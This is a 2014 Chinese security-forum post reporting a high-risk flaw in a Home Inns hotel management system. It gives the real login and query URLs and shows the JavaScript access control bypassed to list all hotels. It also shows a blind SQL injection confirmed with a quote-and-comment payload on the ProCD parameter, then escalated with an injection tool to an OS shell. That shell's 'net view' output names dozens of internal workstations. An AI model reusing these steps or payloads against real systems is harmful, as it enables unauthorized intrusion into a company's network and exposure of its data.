如家某系统存在高危漏洞导致可能管理旗下所有酒店下载

来源：黑吧安全网　浏览：744次　时间：2014-07-12

先上网找了个页面：http://mgs.homeinns.com/Login.aspx,发现什么也玩不了，然后加了个index.aspx，界面如下

发现都有权限控制，js直接跳转了，禁用js后访问，还是有漏网之鱼的好吗？例如

http://mgs.homeinns.com/HLifeCycle/HLCSearch.aspx

点击查询，就会很人性化的输出所有的酒店信息

随便点开左侧的一个酒店，我这里用的是P2886（酒店一定要有曾用名的点开才可用），url为：http://mgs.homeinns.com/HLifeCycle/HLCOldName.aspx?ProCD=P2886

是不是很明显？

其实还有更简单的方法就是：http://mgs.homeinns.com/HLifeCycle/HLCOldName.aspx?ProCD=P2886'--这样就判断出来了，是盲注，所以直接用工具

注入发现权限很大，

，可以执行系统命令，不过站库分离，而且数据库服务器不直接连接外网

看了看本地存储的数据库

看下工作组信息：

太多了os-shell> net view /domain:home

do you want to retrieve the command standard output? [Y/n/a]

command standard output:

---

Server Name Remark

-------------------------------------------------------------------------------

\\021KAIFATEST

\\021RISH-001N

\\021RJSH-0061WRK

\\021RJSH-0091WRK

\\021RJSH-0105WRK

\\021RJSH-0114WRK

\\021RJSH-0143

\\021RJSH-0157WRK

\\021RJSH-0159WRK

\\021RJSH-0203WRK

\\021RJSH-0209WRK

\\021RJSH-0214WRK

\\021RJSH-022WRK

\\021RJSH-0230WRK

\\021RJSH-023WRK

\\021RJSH-0246WRK

\\021RJSH-024WRK

\\021RJSH-027WRK

\\021RJSH-029WRK2

\\021RJSH-044WRK

\\021RJSH-045WRK

\\021RJSH-059WRK

\\021RJSH-060WRK

\\021RJSH-063WRK

\\021RJSH-064WRK

\\021RJSH-065WRK

\\021RJSH-066WRK

\\021RJSH-068WRK

\\021RJSH-069WRK

\\021RJSH-071WRK

\\021RJSH-074WRK

\\021RJSH-075WRK

\\021RJSH-076WRK

\\021RJSH-077WRK

\\021RJSH-080WRK

\\021RJSH-083WRK

\\021RJSH-084WRK

\\021RJSH-085WRK

\\021RJSH-086WRK

\\021RJSH-087WRK

\\021RJSH-089WRK

\\021RJSH-090WRK

\\021RJSH-091WRK

\\021RJSH-092WRK

\\021RJSH-093WRK

\\021RJSH-094WRK

\\021RJSH-095WRK

\\021RJSH-096WRK

\\021RJSH-097WRK

\\021RJSH-098WRK

\\021RJSH-101WRK

\\021RJSH-104WRK

\\021RJSH-106WRK

\\021RJSH-107WRK

\\021RJSH-108WRK

\\021RJSH-109WRK

\\021RJSH-110WRK

\\021RJSH-111WRK

\\021RJSH-112WRK

\\021RJSH-113WRK

\\021RJSH-118WRK

\\021RJSH-119WRK

\\021RJSH-120WRK

\\021RJSH-121WRK

\\021RJSH-125WRK

\\021RJSH-126WRK

\\021RJSH-127WRK

\\021RJSH-128WRK

\\021RJSH-129WRK

\\021RJSH-131WRK

\\021RJSH-138WRK

\\021RJSH-140WRK

\\021RJSH-144AWRK

\\021RJSH-147WRK

\\021RJSH-150WRK

\\021RJSH-151WRK

\\021RJSH-153WRK

\\021RJSH-154WRK

\\021RJSH-155WRK

\\021RJSH-158WRK

\\021RJSH-160WRK

\\021RJSH-161WRK

\\021RJSH-162WRK

\\021RJSH-163WRK

\\021RJSH-166WRK

\\021RJSH-167WRK

\\021RJSH-168WRK

\\021RJSH-171WRK

\\021RJSH-173WRK

\\021RJSH-174WRK

\\021RJSH-177WRK

\\021RJSH-179WRK

\\021RJSH-187WRK

\\021RJSH-189WRK

\\021RJSH-190WRK

\\021RJSH-1921681

\\021RJSH-193WRK

\\021RJSH-195WRK

\\021RJSH-196WRK

\\021RJSH-197WRK

\\021RJSH-199WRK

\\021RJSH-200WRK

\\021RJSH-202WRK

\\021RJSH-206WRK

\\021RJSH-207WRK

\\021RJSH-208WRK

\\021RJSH-211WRK

\\021RJSH-213WRK

\\021RJSH-214WRK

\\021RJSH-215WRK

\\021RJSH-219WRK

\\021RJSH-224WRK